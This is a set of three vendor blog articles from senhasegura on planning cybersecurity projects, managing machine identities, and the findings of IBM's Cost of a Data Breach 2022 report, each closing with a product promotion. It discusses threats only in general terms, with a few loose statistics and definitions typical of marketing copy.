The IBM Cost of a Data Breach 2022 report brought a lot of information that shows the importance of choosing a good cybersecurity project for your organization.

According to information extracted from this document which included interviews with more than 3,600 people working in companies that had their data violated, it was possible to find alarming conclusions.

First, 83% of the organizations surveyed suffered some kind of breach between March 2021 and March 2022. Also, 60% of these attacks increased prices for customers.

It has also been identified that 79% of critical infrastructure organizations have not implemented a zero-trust plan to prevent cyber threats, and 19% of violations occur due to a compromised business partner.

Faced with so many digital security gaps, it can be difficult to know where to start deploying a cybersecurity project. Therefore, we address this issue here. To facilitate your reading, we divided our text into topics. These are:

• About Cybersecurity
• Importance of Cybersecurity
• Cybersecurity Project: What Is It, and What Is Its Importance?
• What Are the Five Types of Cybersecurity?
• People, Processes, and Technologies: Crucial Elements for the Success of Every Cybersecurity Project
• Guidelines for Prioritizing Cybersecurity Projects within a Company
• Key Cyber Threats Faced by Companies
• About senhasegura
• Conclusion

Enjoy the read!

About Cybersecurity

When we talk about cybersecurity, we refer to a set of technologies, procedures, and methods used to prevent attacks on devices, programs, data, and networks, avoiding the activity of hackers and ensuring the privacy of a company’s data, which must be protected from insider and external threats and natural disasters.

However, accelerated by the Covid-19 pandemic, digital transformation has brought several vulnerabilities, such as those related to remote work. As a result, there was a significant increase in data leaks, phishing emails, and account invasions.

Importance of Cybersecurity

Currently, processes in companies are migrating to the online world due to digital transformation, which can “facilitate” the loss of information of great importance to a business.

Thus, organizations need to invest in cybersecurity in order to ensure their operations and prevent threats, such as malware, viruses, and phishing.

One should also be aware that malicious attackers have been improving their techniques over time, so it is increasingly challenging to maintain data security and avoid compromised business.

Another novelty is data protection laws, which have been holding organizations accountable for the exposure of sensitive information from their customers, employees, and business partners, generating million-dollar sanctions.

In practice, these legislations have several requirements to be respected in order to avoid accidental or intentional data loss.

That is, investing in a good cybersecurity project is the recommended measure to avoid inconvenience, financial losses, loss of credibility, and closure of companies.

Cybersecurity Project: What Is It, and What Is Its Importance?

Cybersecurity projects are aimed at promoting digital security within any company. Its importance lies in the possibility of avoiding cyber threats, such as hacker invasions. It also contributes to the fact that errors -whether deliberate or not, of employees or third parties – have fewer impacts on the organization and reduce the possibility of losses, such as: loss of data, credibility, millionaire sanctions imposed by data protection laws, which can even cause the end of a business. And in small companies, this is even more crucial: according to a Cisco study, 60% of organizations affected by a cyberattack shut down operations within 6 months of the incident.

What Are the Five Types of Cybersecurity?

There are five types of cybersecurity. These are:

• Critical Infrastructure Security;
• Application Security;
• Network Security;
• Cloud Security; and
• Internet of Things (IoT) Security.

Check out each of them in detail below:

Critical Infrastructure Security

What Is It?
When talking about critical infrastructure security, we refer to the area that contemplates the security of systems, networks, and assets in industries that are essential to ensure the security of a country’s economy, health, and public services. These sectors include the chemical, communications, utilities, energy, and financial industries.

What Are the Challenges?
A major challenge for critical infrastructure is the security issues its systems present versus the limited protection features.

Application Security

What Is It?
Application security is essential as these programs have increasingly become targets for hackers. It consists of practices adopted to make them more secure, which occurs during their development and then after their implementation.

What Are the Challenges?
Ensuring application security requires tracking all the tools developed for these applications. It is also important to be aware of the future needs of a company, which may require software aimed at a more complex infrastructure.

Network Security

What Is It?
Network security is a term that refers to hardware and software solutions, as well as procedures aimed at protecting the network and data against cyberattacks. In practice, this concept includes network analysis, application security, access control, and antivirus software, among other factors.

What Are the Challenges?
The main challenge of network security is to maintain protection in increasingly complex structures, with a large volume of cyber threats and several functionalities used in corporations, which also represent new problems.

Cloud Security

What Is It?
As companies suffer the impact of digital transformation, they become more dependent on cloud solutions and need to adopt measures that ensure digital security in this context.

This is because outsourced providers may even be responsible for infrastructure management, but the accountability for any exposed data remains with the organization as well.

What Are the Challenges?
The challenges of companies adopting cloud solutions are related to the ability to meet security criteria in a dynamic environment, which can generate a lack of visibility in accessing and using data.

Internet of Things (IoT) Security

What Is It?
Internet of things security is associated with protecting devices connected directly to the cloud in gadgets, such as surveillance cameras. Its function is to protect designed devices, without taking into account aspects of cybersecurity and data protection.

What Are the Challenges?
The greatest challenge associated with the internet of things security refers to human activity. In practice, with the increased connectivity of these devices, it is necessary to instruct users on the change of default passwords and the need for updates, for example.

On the other hand, many users do not see these devices as targets of attacks and end up ignoring best security practices during their development and use.

People, Processes, and Technologies: Crucial Elements for the Success of Every Cybersecurity Project

An efficient cybersecurity project does not only involve the five types of digital security covered in the previous topic. It is also important to take other essential elements into account. They are: people, processes, and technology.

Here’s what you need to know about these aspects:

People

When it comes to cybersecurity projects, investing in cutting-edge technology is not enough. It is essential to train users to respect security protocols and ensur
e the protection of company data.

In practice, your employees increase security risks in a variety of ways.
Among them, we can highlight:

Clicking on URLs and Opening Suspicious Emails

It is necessary to make your employees aware of the risks involved in this practice and encourage the exclusion of emails from fake addresses to protect sensitive data.

Keeping the Same Password for a Long Period

To ensure the security of your company, employees’ passwords must be changed regularly. In addition, strong combinations should be used, and it is not recommended to reuse the same password in different services.

Due to the difficulty in memorizing so many passwords, we also recommend the use of a password vault, which will only require the memorization of a single code.

Personal Browsing

Many people use the devices of their companies for personal purposes, such as accessing social media, shopping, or paying bills. The big problem is that this behavior facilitates the work of malicious agents who want to collect information. Therefore, ask your employees to use their own devices, not corporate ones, for personal browsing.

Lack of Backups

Many people still fail to perform backups when finishing their tasks. Nevertheless, it is of paramount importance to back up the system files. So, employees should understand they need the help of the IT team with these functions.

Unattended Devices

Leaving devices on desks unattended and without blocking them is a fairly common practice, which can also cause damage to the security of a company. For this reason, it is essential to make employees aware of the importance of preserving data contained in these devices and maintaining their control.

Processes

Information security professionals use numerous processes to protect sensitive data. In practice, they need to identify and combat cyber threats, protecting information and responding to incidents.
Besides being implemented, these processes must be documented to save time and financial resources, and preserve customer confidence in cases of cyberattacks.

To counter cybersecurity-related risks, we recommend using the Cybersecurity Framework, developed by the National Institute of Standards and Technology (NIST) of the U.S. Department of Commerce, after former U.S. President Barack Obama signed an executive order in 2014.

Technology

After the deployment of security processes, it is indispensable to assess the tools available to avoid cyber threats.

For this, you must consider two types of technology: those that will help you prevent and combat attacks, such as antivirus, DNS filtering, and malware protection; and those that need protection, including computers, routers, and the cloud.

Previously, we could rely on security perimeters. Now, migration to cloud environments, remote work, and policies like Bring Your Own Device (BYOD) have made it easier for hackers to work.

Guidelines for Prioritizing Cybersecurity Projects within a Company

A cybersecurity project is essential to not overwhelm IT staff with unnecessary work and to ensure the company’s ability to deal with a cyberattack.

However, to create and run your cybersecurity project, you must take some action. They are as follows:

Understanding Your Company’s Goals

Each organization has its strategic goals, which should guide the creation of the cybersecurity project. Therefore, it is important to evaluate the company’s vision and its business and cybersecurity strategies.

This information will provide a basis for the development of the project and will be a guide to gradually know if it is, in fact, efficient.

To understand the strategic goals of the company, read documents related to the subject and talk to top management to know their priorities.

Discovering the Reason Behind the Project

Cybersecurity projects can be motivated by several reasons, although all of them need to prevent and combat cyber incidents in common.

In practice, the project can be an awareness and training campaign on cybersecurity, the implementation or updating of a security system, compliance with new laws and regulations, etc.

Understanding what the project’s motivation is will certainly contribute to establishing priorities, directly impacting the company’s operations.

Determining the Value of the Project

Here, when we talk about value, we are referring to the importance of a cybersecurity project for an organization. That is, it is convenient to analyze how it will impact stakeholders and what its real importance is to the business. A project that adds great value must necessarily be prioritized.

Analyzing the Urgency

It is important to assess the urgency of the cybersecurity project to determine whether it should be prioritized or can wait. But remember that priorities can and should be modified as changes occur.

Detailing the Aspects that Affect the Project’s Success

A successful cybersecurity project depends on a number of factors, including budgets, deadlines, and return on investment (ROI), among other things.

On the other hand, it is often impossible to execute a project due to unfavorable circumstances. Therefore, it is advisable to know what can affect the project’s success in advance.

Ranking the Cybersecurity Project According to the Priority

With the information on goals, objectives, and possibilities of success in hand, it is time to establish an order of priorities through an overall classification, which can be score-based.

Defining How Many Projects Can Be Executed at a Time

Probably, the organization will not be able to assume all priority projects at once. Thus, the solution is to work on them in a phased manner, creating a queue of plans to execute.

Another recommendation is to run the fastest ones first and then the ones that require more time and effort.

Sharing Findings with Top Management

Before starting the cybersecurity project, it is essential to meet with leaders and share the information gathered. This is because the findings can serve as insights to change the order of priorities of the projects, requiring top management to be on board.

Working Flexibly

Working with cybersecurity projects requires flexibility, after all, priorities can be modified according to context. By the way, this occurred in most companies after the beginning of Covid-19, which accelerated the mass adoption of remote work and brought new demands to security teams.

Key Cyber Threats Faced by Companies

The following are the main cyber threats that should be considered by a cybersecurity project:

• Ransomware;
• Phishing;
• Attacks on Mobile Devices;
• Attacks Using QR Codes;
• Denial-of-Service (DDoS) Attacks; and
• LotL and AVT Attacks.

See the detailed explanation of each of them below:

Ransomware

This type of cybercrime works like this: the attacker blocks a network or system and asks for millionaire amounts in exchange for the release of information, which may not be returned, but sold to other criminals. Due to the lack of efficient cybersecurity mechanisms in companies, this tactic is very common.

Phishing

Another common crime in the virtual environment is phishing, which consists of sending counterfeit emails, and pretending to be a legitimate organization. With this, malicious agents convince their victims to share personal information or take action to their benefit.

There are also some types of very sophisticated phishing attacks, such as very realistic audio recordings produced through artificial intelligence.

Attacks on Mobile Devices

With many people working remotely, the use of personal devices for corporate purposes and the use of corporate devices for personal purposes tend to occur more frequently.
This increases security vulnerabilities, especially in the face of malware
attacks on devices.

Attacks Using QR Codes

Currently, cybercriminals use QR Codes to deploy malware applications, infecting their victims’ phones and stealing their bank details.
For this reason, it is advisable to check the code provided by the company before accessing it.

Denial-of-Service (DDoS) Attacks

This type of attack occurs when the hacker overloads a machine with traffic, disrupting its normal operation and making a service unavailable to users. In practice, the attack is performed through a single computer.

LotL and AVT Attacks

Less known, Living off the Land (LotL) attacks do not need to create malicious files to access a company’s systems because they use gateways that already exist.
Advanced Volatile Threat (AVT) attacks allow access to an organization’s data as quickly as possible.

About senhasegura

We, from senhasegura, are part of MT4 Tecnologia, a group of companies specializing in digital security, founded in 2001 and operating in more than 50 countries.

Our main objective is to ensure digital sovereignty and security for our clients, granting control over privileged actions and data and avoiding theft and leaks of information.

For this, we follow the lifecycle of privileged access management through machine automation, before, during, and after accesses.

These are also our commitments:

• Avoid interruptions in the activities of companies, which may impair their performance;
• Automatically audit the use of privileges;
• Automatically audit privileged changes to identify privilege abuses;
• Provide advanced PAM solutions;
• Reduce cyber risks;
• Bring organizations into compliance with audit criteria and standards such as HIPAA, PCI DSS,
• ISO 27001, and Sarbanes-Oxley.

Conclusion

In this article, you saw that:

• Cybersecurity is a set of technologies, procedures, and methods used to prevent cyberattacks;
• Digital transformation has brought new vulnerabilities to IT structures;
• Companies should invest in cybersecurity to prevent threats, such as malware, viruses, and phishing;
• Data protection laws hold organizations accountable for the exposure of sensitive information of their customers, employees, and business partners;
• Cybersecurity projects are aimed at promoting digital security within any company;
• There are five types of cybersecurity: critical infrastructure security, application security, network security, cloud security, and Internet of Things (IoT) security;
• People, processes, and technology stand out among the crucial elements for the success of a cybersecurity project;
• To define the priorities of cybersecurity projects within a company, one needs to understand the organization’s objectives, find out the reason for each project, determine its value, assess its urgency, detail aspects that interfere with its success, rank projects in order of priority, define how many projects it is possible to execute at a time, share the findings with top management, and work flexibly;
• The main threats faced by companies are ransomware, phishing, mobile device attacks, attacks using QR Codes, denial-of-service (DDoS) attacks, and LotL and AVT attacks.

Remote work and the adoption of cloud computing surfaced the concept of identity as a perimeter.
In this sense, although it is not new, identity security first gained urgency as malicious attackers began to use machine identity management and access to achieve their goals.

Currently, hackers have been successful in targeting Active Directory and identity infrastructure to move laterally on networks with vulnerabilities.

It is worth mentioning that the use of multifactor authentication (MFA) is growing, but it is still necessary to configure, maintain, and monitor the identity infrastructure properly.

In this article, we will explain everything about this subject. To facilitate your reading, we divided our text into topics. These are:

• What is Machine Identity?
• Importance of Machine Identity Management
• Challenges in Machine Identity Management
• Seven Best Practices in Machine Identity Management
• Other Best Practices
• About senhasegura
• Conclusion

Enjoy the read!

What is Machine Identity?

Just as people use usernames and passwords to protect their identities, machines have their unique identifications protected by these credentials, as well as keys and certificates.

Without proper machine identity management, it becomes impossible to guarantee the confidentiality of data obtained by authorized devices and to prevent this information from being transferred to unauthorized machines.

In practice, a machine with a compromised identity can damage the company’s digital security. This is because hackers can use them to gain privileged access to data and resources from the organization’s networks.

Moreover, by stealing or forging a machine identity, an attacker is able to impersonate a legitimate machine and obtain sensitive data.

To account for the volume, variety, and speed of changes in machine identity, one needs to strategically manage a complex and rapidly changing data set.

Through appropriate policies and controls, machine identity management contributes to optimizing a corporation’s cybersecurity, reducing risks, and ensuring compliance with security requirements.

Importance of Machine Identity Management

Proper machine identity management is critical to preventing compromised credentials, keys, and certificates from being used to invade infrastructure, giving access to sensitive data, or being used to create fraudulent tunnels and hide malicious actions.

It also allows one to track the exponential growth in the number of machines to keep their identities secure and track the evolution of cloud services, which can expose machine identities to hacker action.

With the correct machine identity management, it is also possible to protect mobile devices, sensors, and robots, which can communicate and store sensitive information using encryption.

In addition, we live in a context where machines have increasingly intelligent functions, replacing people in activities that require logical reasoning and thinking, and machine identity management allows us to interact securely with this type of equipment.

Challenges in Machine Identity Management

In the previous topic, we showed the importance of machine identity management in data protection. However, we know efficient machine identity management can be quite challenging.

One of the reasons is the increase in IT and OT devices, which also increases the number of credentials, certificates, and keys.

Also, traditional practices are insufficient to meet the demands of machine identity management, which can cause cyberattacks and interruption of activities.
In this sense, the most common challenges are:

Visibility

With a large number of machine identities, it becomes difficult to keep track of existing credentials and know where they are. With this, hidden certificates can expire without anyone noticing, causing an interruption in activities.

Besides being difficult to locate all certificates on a company’s network, some of them are on devices outside the network perimeter, which can go unnoticed by audit processes.

Compliance

To ensure compliance with security requirements, it is essential to regulate the issuance, validity, security levels, and access. Thus, the lack of proper machine identity management, which contemplates TLS/SSL certificates and SSH keys, opens gaps for the action of malicious agents.

Storage

It is very common for certificates and keys to be stored in spreadsheets and distributed by email, however, as the number of machine identities increases, their control in spreadsheets is susceptible to errors.

Manual Management

Manual machine identity management is also a mistake, as it makes the process slow and error-prone.

In practice, applications and devices do not go online quickly after manually registering and provisioning certificates. In addition, manual renewal, revocation, and auditing may cause interruptions in activities.

Seven Best Practices in Machine Identity Management

Here are some practices you need to adopt in your organization’s machine identity management:

Identify This Type of Identity in the Infrastructure

Two hundred and sixty-seven thousand: this is the average number of internal certificates that an IT organization has, according to the Ponemon Institute. Many of these certificates are old, with the possibility of being encoded or hidden among other identities.

To get a sense of it, in a survey by Vanson Bourne, 61% of companies admitted they do not have full knowledge of their keys and certificates for devices. Of these, 96% claimed to suffer consequences such as violations, interruption of systems, and financial losses.

To ensure proper machine identity management, you need visibility into the devices your company uses. Therefore, it is essential to verify this type of identity in the infrastructure.

The good news is that you can count on the support of senhasegura for this: we were considered by Gartner as best in class for the discovery and integration of privileged credentials.

Periodically Rotate Machine Identities

Another indispensable measure is to rotate machine identities periodically to prevent their misuse by malicious users.

This is because when keys and certificates remain the same for a long time, they can be targeted by hackers, who use known API calls with a real certificate to gain access to critical resources and data.

To avoid this problem, organizations must have authorization from source machines, cloud connections, portable devices, application servers, and API interactions. Moreover, certificates should be updated frequently.

Implement Privileged Access Management solutions

To perform proper machine identity management, we also recommend the use of Privileged Access Management (PAM) tools. This type of solution prevents cyberattacks as it grants each user only the access necessary to perform their tasks.

We, from senhasegura, are leaders in this market and can help you protect the machine identities of your organization.

Implement Automation in the Environment Through RPA and PTA

Robotic Process Automation (RPA) consists of the use of technological tools to automate operational and transactional tasks, such as sending e-mails, checking financial data, preparing receipts, and managing payrolls.

Privileged Task Automation (PTA) automates an organization’s workflow tasks, ensuring they are completed at any time without stopping operations. These two mechanisms contribute to preventing violations motivated by human errors.

Nevertheless, it is necessary to manage the identities of software robots, starting with the definition of the best policies on how to integrate them.

Reduce Risk w
ith Zero Trust Plans

To provide more security to machine identity management, it is advisable to adopt the concept of zero trust in equipment. That is, it is not enough for corporate users to be frequently authenticated, it is necessary to extend this standard to devices.

The problem is that, despite already adopting this people-focused work model, many companies still consider device authentication a challenge.

Include the Cloud in the Machine Identity Management Plan

With the digital transformation accelerated by the Covid-19 pandemic, many companies started operating in the remote work model, using cloud solutions.

Therefore, when we talk about machine identity management, it is necessary to think of solutions that contemplate cloud environments.

Ideally, one should apply an approach that centralizes functions and enables them to manage multiple cloud deployments.

Adopt Machine Identity Management Solutions

Companies need to have teams specifically responsible for machine identity management, preventing certificates and keys from remaining unmanaged.

And to optimize this work, it is advisable to adopt automated machine identity management solutions that manage the entire certificate lifecycle.

Automated solutions are very effective and allow scalability in organizations, following the implementation of new technologies. However, machine identities should not be implied but expressly assigned.

Other Best Practices

Here are some other best practices for you, who need to deal with machine identity management.

Ensure Visibility

For no machine to be left unmanaged, it is indispensable to make a scan of all certificates and keys. This search should include devices that are outside the network perimeter. In addition, it is important to know the location, CA, and expiration date of each certificate.

Count on Centralized Management

Centralizing machine identity management is a way to simplify its implementation across environments, devices, and workloads. It is also possible to group certificates, taking into account their type, level of criticality, and expiration date.

Proper machine identity management protects communication and prevents the action of malicious attackers.

Use Self-Service

It is possible to use self-service for the provision, renewal, and revocation of certificates, making machine identity management more efficient. In this sense, to keep identities well protected and limit the actions of teams, you just need to implement role-based access controls and privileges.

Store Certificates and Keys in Secure Locations

Digital certificates and SSH keys should be stored in centralized and secure locations, preferably on encrypted devices. Moreover, access to these devices should be limited to privileged users with the use of strong passwords and RBAC.

These measures ensure the security of the machine identity, even if the network is compromised.

Key Rotation

Many companies are vulnerable to the action of malicious former employees, who have access to old certificates, keys, and encrypted algorithms. To avoid this problem, we strongly recommend changing old keys to new ones.

Automation

As we have already suggested, automation is the solution to most cybersecurity issues. In the case of machine identity management, automating this process ensures keys and certificates are always up to date and allows you to avoid problems such as interruption of activities.

Perform Audits Frequently

Performing frequent audits on machine identities is important because this process allows one to detect and eliminate issues such as weak passwords, unauthorized or expiring certificates, and old and unused keys.

For this, you can use an audit solution provided by third parties. Thus, it is possible to avoid interruption of activities, prevent violations, and optimize machine identity management.

About senhasegura

We, from senhasegura, are part of the group of information security companies MT4 Tecnologia, founded in 2001, and we aim to provide digital sovereignty to our customers through the control of privileged actions and data.

With this, we prevent data leaks and theft, as we manage privileged permissions before, during, and after access through machine automation. We work to:

• Optimizing the performance of companies, avoiding interruption of operations;
• Performing automatic audits on the use of permissions;
• Auditing privileged changes to detect abuse of privilege automatically;
• Providing advanced solutions with the PAM Security Platform;
• Reducing cyber threats; and
  Bringing the organizations that hire us into compliance with audit requirements and standards such as PCI DSS, Sarbanes-Oxley, ISO 27001, and HIPAA.

Conclusion

In this article, you saw that:

• Machines have their unique identities protected by keys and certificates;
• The increase in IT and OT machines generates a significant growth in the number of certificates and keys;
• Without proper machine identity management, it becomes impossible to guarantee the confidentiality of data obtained by authorized machines and to prevent this information from being transferred to unauthorized ones;
• Malicious actors can use compromised machine identities to gain privileged access to data and resources from the organization’s networks;
• Machine identity management contributes to optimizing the cybersecurity of a corporation;
• It also allows one to keep up with the exponential growth in the number of machines and protect mobile devices, sensors, and robots;
• The main challenges in machine identity management are: visibility, compliance, storage, and manual management;
• Some of the best practices for this management are: recognizing machine identities, rotating these identities periodically, implementing Privileged Access Management solutions, implementing automation in the environment, reducing risks through the Zero Trust concept, including cloud solutions in machine identity management, and adopting automated machine identity management solutions;
• It is also essential to ensure the visibility of devices, rely on centralized management, use self-service, store certificates and keys in secure places, and perform audits frequently;
  senhasegura was considered by Gartner as best in class for discovery and integration of privileged credentials;
• In addition, the company provides a PAM solution, which avoids cyberattacks through the Principle of Least Privilege.

Did you like our content on machine identity management? Then share it with someone who may be interested in the topic.

Companies of all sizes and industries should be concerned about the impacts of a data breach, since, according to the IBM Cost of a Data Breach 2022 report, its average cost is $4.35 million, and 83% of companies had more than one breach.

With this in mind, we prepared an article exploring the main information collected by this document. To facilitate your reading, we divided our text into topics. These are:

• What Is the IBM Cost of a Data Breach Report?
• IBM Cost of a Data Breach 2022 report: What’s New
• Main Data Collected in the IBM Cost of a Data Breach 2022 Report
• Topics with Detailed Results
• Suggested Security Recommendations in the Report
• About senhasegura

Enjoy the read!

What Is the IBM Cost of a Data Breach Report?

The IBM Cost of a Data Breach report is an annual survey of data breaches, which provides insights into hundreds of breaches so that the public can understand current cyber threats.
With nearly 20 editions, this document provides IT professionals with tools to deal with security risks, showing which factors can favor or help prevent cyberattacks.

IBM Cost of a Data Breach 2022 report: What’s New

In its latest edition, the IBM Cost of a Data Breach report has conducted more than 3,600 interviews with professionals from 550 companies that suffered violations between March 2021 and March 2022.
The questions made during the interviews aimed to evaluate the costs of organizations to respond to data breaches in the short and long term.

What’s more: the report has assessed the causes and consequences of the violations that occurred in 17 industries located in different countries and regions, and addressed the impact of certain factors and technologies to reduce losses.

Here are some new things from the IBM Cost of a Data Breach report:

• The 2022 edition has brought analyses related to extended detection and response, the use of risk quantification techniques, and the impacts of individual technologies on zero-trust security structures;
• It analyzed what contributes to higher data breach costs and the effects of supply chain commitments and the gap in security skills;
• It examined areas of cloud security vulnerability to critical infrastructure;
• It assessed, in greater depth than in previous years, the impacts of ransomware and destructive attacks; and
• It studied the phenomenon of remote work, which many companies adopted due to the covid-19 pandemic.

Main Data Collected in the IBM Cost of a Data Breach 2022 Report

Check the key findings from the IBM Cost of a Data Breach 2022 report:

• The average cost of a data breach was $4.35 million in 2022, an increase of 2.6% over the previous year, when the average cost was $4.24 million;
  83% of the companies studied suffered more than one data breach and only 17% said this was their first breach;
• 60% of organizations had to increase the price of their services or products because of a data breach;
  The average cost of a data breach for the critical infrastructure organizations surveyed was $4.82 million – $1 million more than the cost for companies from other segments;
• 28% of critical infrastructure organizations have suffered a destructive or ransomware attack, and 17% have been violated because of a compromised business partner;
• Cyberattacks on companies with deployed security and automation AI cost $3.05 million less than violations on organizations that do not invest in these resources;
• The average cost of a ransomware attack fell from $4.62 million in 2021 to $4.54 million in 2022;
  Stolen or compromised credentials remain a leading cause of data breaches, accounting for 19% of breaches in the 2022 study;
• Leaks involving credentials are the ones that take the longest to be detected. On average, 327 days are required for identification and remediation;
• Only 41% of the organizations in the study have deployed zero-trust security architecture;
  Violations related to remote work cost, on average, about $600,000 more if compared to the global average;
• 45% of violations in the study occurred in the cloud;
• The average cost of health-related violations has increased by almost $1 million, reaching $10.10 million;
• The top five countries and regions with the highest average cost of a data breach were the United States, the Middle East, Canada, the United Kingdom, and Germany.

Topics with Detailed Results

The IBM Cost of a Data Breach 2022 report analysis 16 topics. These are:

• Global Highlights;
• Data Breach Lifecycle;
• Initial Attack Vectors;
• Key Cost Factors;
• Security and Automation AI;
• XDR Technologies;
• Incident Response (IR);
• Quantification of Risk;
• Zero Trust;
• Ransomware and Destructive Attacks;
• Attacks on the Supply Chain;
• Critical Infrastructure;
• Cloud Violations and Cloud Model;
• Remote Work;
• Skills Gap; and
• Mega Violations.

The following are five of these topics in detail:

Data Breach Lifecycle

We call the lifecycle of a data breach the time elapsed between the discovery of the breach and its containment.

According to the IBM Cost of a Data Breach 2022 report, the average time to identify and contain a data breach is currently 277 days. In 2017, the average time was 287 days, that is, 3.5% more.

In 2021, it took an average of 212 days to detect a violation and 75 days to contain it. In 2022, it took 207 days to identify the violation and 70 days to contain it.

The report has also shown that the less time an organization takes to identify and contain a data breach, the less its financial impact is.

However, the cost difference between a lifecycle of more than 200 days and a lifecycle of less than 200 days was lower in 2022 than in 2021: in 2021, the difference was $1.26 million, the largest in seven years and, in 2022, it was $1.12 million.

Incident Response

Relying on an incident response team reduces the average cost of a data breach and, according to the IBM Cost of a Data Breach 2022 report, 73% of the companies that participated in the survey claimed to have an incident response plan.

The report also pointed out that the average cost of a violation in these companies in 2022 was $3.26 million versus $5.92 million spent by companies without incident response resources, a difference of $2.66 million. In the previous year, this difference was $2.46 million, and in 2020, $1.77 million.

Zero Trust

The implementation of a zero-trust security architecture was performed by 41% of the companies that participated in the IBM Cost of a Data Breach 2022 report. In 2021, this number was lower: 35%.

The study also revealed companies that deployed zero trusts saved almost $1 million with data breaches when compared to those that did not invest in this concept.

This is because the average cost of a violation was $4.15 million in organizations with zero trust deployed and $5.10 mi
llion in companies that did not use the same approach.

When we talk about implementing zero trust in a mature stage, the economy is even greater, reaching more than $1.5 million. Companies with early-stage zero trust practices spent an average of $4.96 million on data breaches, while for those that had these practices consolidated, the average cost was $3.45 million.

Cloud Violations and Cloud Model

The Covid-19 pandemic has accelerated the mass adoption of remote work by organizations and, consequently, the use of technologies such as cloud computing, impacting cybersecurity.

However, the IBM Cost of a Data Breach 2022 report brings interesting data on the subject, which was analyzed for the second year: according to the document, 45% of violations occurred in the cloud. Moreover, the costs of breaches in private clouds are significantly higher than in hybrid clouds.

Another revealing fact is that 43% of companies claimed they were still in the early stages of their practices protecting cloud environments, showing that, in general, organizations still need to evolve a lot.

Nevertheless, the most worrying fact is that 17% of companies have yet to take any action to protect their cloud environments.

Remote Work

Since the beginning of the pandemic, the IBM Cost of a Data Breach report analyzes the impacts of remote work on data breaches. In its 2022 edition, the survey has shown data breach costs were higher for companies that have more employees working remotely.

In practice, companies that have between 81% and 100% of employees working outside the corporate environment had an average cost of $5.10 million. Companies with less than 20% of their team working remotely had to bear an average cost of $3.99 million, a difference of $1.11 million (24.4%).

In addition, the average cost of a data breach was $4.99 million for companies that had remote work as the cause of the breach, while this loss was $4.02 million when remote work was not the cause.

Suggested Security Recommendations in the Report

The IBM Cost of a Data Breach 2022 report also contains important security recommendations on its pages, which can help prevent problems with data breaches. Check them out:

Adopting a Zero Trust Security Model

According to the results of the study, organizations that implemented a zero-trust approach in their security at a mature stage have saved $1.5 million. Therefore, it is convenient to adopt this security model in your company to reduce the financial impacts of a data breach.

Protecting Cloud Environments with Policies and Encryption

Companies that have adopted mature cloud security practices have saved $720,000 compared to those that did not care about the subject. Thus, it is recommended to invest in security policies, data encryption, and homomorphic encryption to prevent data breaches.

Using Incident Response Manuals

Another highly recommended practice is to create and test incident response manuals, as companies that regularly test their plan have saved $2.66 million in violations over those that do not rely on an IR plan team or test.

Improving Incident Detection and Response Times

Added to security and automation AI, Extended Detection and Response (XDR) capabilities contribute to reducing the average costs of a data breach as well as its lifecycle. The study pointed out that companies with XDR deployed have reduced the lifecycle of a violation by 29 days, on average, when compared to organizations that did not implement XDR, saving $400,000.

Monitoring Endpoints and Remote Employees

Finally, the IBM Cost of a Data Breach 2022 report reinforces the need to monitor endpoints and remote workers, showing that violations caused by this modality cost almost $1 million more than violations in which remote work was not a factor.

About senhasegura

We, from senhasegura, are a company specializing in cybersecurity. Our mission is to provide our clients with sovereignty over their actions and privileged information.
To do this, we offer our PAM solution, which helps companies protect themselves from all the threats presented in the IBM Cost of a Data Breach 2022 report.